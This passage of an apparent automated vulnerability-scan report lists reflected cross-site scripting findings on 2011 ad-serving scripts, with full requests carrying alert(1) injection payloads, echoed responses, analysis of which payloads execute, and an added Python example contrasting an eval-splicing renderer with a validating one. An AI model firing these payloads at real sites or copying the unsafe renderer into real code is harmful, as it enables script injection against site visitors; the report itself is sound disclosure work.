The value of the coad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks; that string is the argument of an eval() call that builds the _banners array. The payload eb27a'%3balert(1)//3becd2a0162 was submitted in the coad parameter. The server URL-decoded %3b, and the input was echoed as eb27a';alert(1)//3becd2a0162 in the application's response.

The reflection is unfiltered, so JavaScript can be injected into the response. One caveat on the proof of concept as shown: the sink sits on the single line visible in the response, so the // in the payload also comments out the closing parenthesis of eval() and the closing brace of the VINDICOSUITE.XUMO object literal; the script would fail to parse and alert(1) would not run. A payload that executes must close those delimiters before commenting out the rest of the line.

Request

GET /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp?coad=ca,300,250eb27a'%3balert(1)//3becd2a0162 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 14025
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:37:32 GMT
Connection: close

/*
* /xumo/libs/vindicosuite/xumoJS/tags/1.5.6/vindicosuite.xumo.min.js
* (c) 2010 BBE, Inc. All Rights Reserved.
* VERSION 1.5.6.4
*
*/
var VINDICOSUITE={};VINDICOSUITE.XUMO={version:"1.5.6.4",_banners:eval('[{id : "ca", width : "300" , height : "250eb27a';alert(1)//3becd2a0162"}]'),_debug:eval('false'),_min:eval('false'),_inplace:eval('true'),_inject:eval('true'),_trackingDomain:eval('false')?"64.15.238.78":"tracking.vindicosuite.com",jsfile:'/xumo/libs/vindicosuite/xumoJS/
...[SNIP]...
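The sink in 1.143 combines two mistakes: a request value is spliced into JavaScript source by string concatenation, and the resulting string is handed to eval(). The Python below is an added example, not code from the xumo library or from the report. render_banners_unsafe is a hypothetical reconstruction that reproduces the response fragment byte for byte; render_banners_safe validates the value and emits a JSON literal so that no eval() and no quoting are needed; js_string_literal is the fallback for a value that genuinely must stay a JavaScript string. The coad format id,width,height is inferred from the one request on the page (coad=ca,300,250 becomes id "ca", width "300", height "250"); only a single banner triple is handled here.

```python
import json
import re

BANNER_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
DIMENSION = re.compile(r"[0-9]{1,4}")

# Characters that may never appear raw inside a JavaScript string literal that
# is written into a script: both quotes, backslash, line terminators (U+2028 and
# U+2029 count as newlines in JS) and <, >, & so the literal can never form
# </script if the same output is ever inlined in HTML.
_JS_ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"', "<": "\\x3c", ">": "\\x3e", "&": "\\x26",
    "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
}


def js_string_literal(value, quote="'"):
    """Escape value for embedding between quote characters in JavaScript source."""
    escaped = "".join(_JS_ESCAPES.get(ch, ch) for ch in value)
    return f"{quote}{escaped}{quote}"


def parse_coad(coad):
    """coad is 'id,width,height' (format inferred from the report's request)."""
    parts = coad.split(",")
    if len(parts) != 3:
        raise ValueError("coad must be id,width,height")
    banner_id, width, height = parts
    if not BANNER_ID.fullmatch(banner_id):
        raise ValueError(f"bad banner id {banner_id!r}")
    for dim in (width, height):
        if not DIMENSION.fullmatch(dim):
            raise ValueError(f"bad dimension {dim!r}")
    return {"id": banner_id, "width": width, "height": height}


def render_banners_unsafe(coad):
    """Hypothetical reconstruction of the vulnerable pattern: the raw value is
    spliced into a single-quoted string which the page then passes to eval()."""
    banner_id, width, height = coad.split(",", 2)
    return ("_banners:eval('[{id : \"%s\", width : \"%s\" , height : \"%s\"}]')"
            % (banner_id, width, height))


def render_banners_safe(coad):
    """No eval and no hand-built quoting: validate, then emit a JSON literal.
    json.dumps escapes quotes and backslashes; translate() additionally turns
    <, > and & into \\u escapes so the literal is inert inside an HTML script."""
    banner = parse_coad(coad)
    literal = json.dumps([banner]).translate(
        {ord("<"): "\\u003c", ord(">"): "\\u003e", ord("&"): "\\u0026"})
    return f"_banners:{literal}"


PAYLOAD = "ca,300,250eb27a';alert(1)//3becd2a0162"   # decoded coad value from 1.143


def demo():
    """Returns (unsafe output, payload rejected by the safe renderer,
    payload escaped as a JS string literal, safe output for the benign value)."""
    unsafe = render_banners_unsafe(PAYLOAD)
    try:
        render_banners_safe(PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return unsafe, rejected, js_string_literal(PAYLOAD), render_banners_safe("ca,300,250")


if __name__ == "__main__":
    for label, value in zip(("unsafe", "rejected", "escaped", "safe"), demo()):
        print(f"{label}: {value}")
```

The unsafe renderer reproduces the response line from the report, quote break and all. The safe renderer rejects the payload on the height field, and even the fallback escaping keeps the attacker's apostrophe inside the literal, so the statement after it stays a string rather than becoming code.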

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the pid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae03c(a)950fcf2715c was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. In this response the value is concatenated into the name of the function called on the last line, VwP<pid>LoadSelect(); the echoed line VwP61576ae03c(a)950fcf2715cLoadSelect(); is not valid JavaScript because 950fcf2715cLoadSelect begins with a digit, which is why execution could not be confirmed, but the reflection itself is unfiltered.

Request

GET /dynamic.js?geo=true&pid=61576ae03c(a)950fcf2715c&vnam=select&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:48 GMT
Connection: keep-alive


var connection_speed_select = "broadband";
var country_select = "us"; var region_select = "texas"; var city_select = "dallas"; var zip_code_select = "75207"; var metro_code_select = "623";
VwP61576ae03c(a)950fcf2715cLoadSelect();

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the vnam request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69067(a)4f9dac9508e was submitted in the vnam parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Here vnam is appended to every variable name in the response (connection_speed_select<vnam>, country_select<vnam>, region_select<vnam> and so on), so the value lands in identifier positions in several declarations rather than in a string.

Request

GET /dynamic.js?geo=true&pid=61576&vnam=select69067(a)4f9dac9508e&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 332
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:53 GMT
Connection: keep-alive


var connection_speed_select69067(a)4f9dac9508e = "broadband";
var country_select69067(a)4f9dac9508e = "us"; var region_select69067(a)4f9dac9508e = "texas"; var city_select69067(a)4f9dac9508e = "dallas"; var zip_code_select69067(a)4f9dac9508e = "7
...[SNIP]...

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2315b"%3balert(1)//bc620037b7e was submitted in the $ parameter. This input was echoed as 2315b";alert(1)//bc620037b7e in the application's response. The value appears three times in the response: in the FFpb Set-Cookie header, inside the single-quoted zzPat literal (where a double quote does not break out) and inside the double-quoted zzStr literal (where it does).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two things to check by hand: the same value is written unencoded into the FFpb Set-Cookie header, where the ; in the payload terminates the cookie value and whatever follows is parsed as a cookie attribute; and in the zzStr line the // comment also removes the } that closes the surrounding if block, so this exact payload needs the block re-balanced before it will run. The single-quote variant in the next finding does not have that problem.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=2315b"%3balert(1)//bc620037b7e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:2315b";alert(1)//bc620037b7e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',2315b";alert(1)//bc620037b7e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,2315b";alert(1)//bc620037b7e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cd2c'%3balert(1)//2d011e94584 was submitted in the $ parameter. This input was echoed as 5cd2c';alert(1)//2d011e94584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Here the ' closes the single-quoted zzPat literal cleanly and the // only removes the remainder of that line (var zzCustom='';), so no block delimiter is lost; of the two $ findings this is the one that executes as written. The value is again also echoed into the FFpb Set-Cookie header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=5cd2c'%3balert(1)//2d011e94584&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:5cd2c';alert(1)//2d011e94584;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',5cd2c';alert(1)//2d011e94584';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5cd2c';alert(1)//2d011e94584;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab871'%3balert(1)//3d87bda826d was submitted in the $ parameter. This input was echoed as ab871';alert(1)//3d87bda826d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ab871'%3balert(1)//3d87bda826d&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ab871';alert(1)//3d87bda826d;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:06 GMT
Connection: close
Content-Length: 2069

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ab871';alert(1)//3d87bda826d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ab871';alert(1)//3d87bda826d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34260"%3balert(1)//38aea2a88ac was submitted in the $ parameter. This input was echoed as 34260";alert(1)//38aea2a88ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=34260"%3balert(1)//38aea2a88ac&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
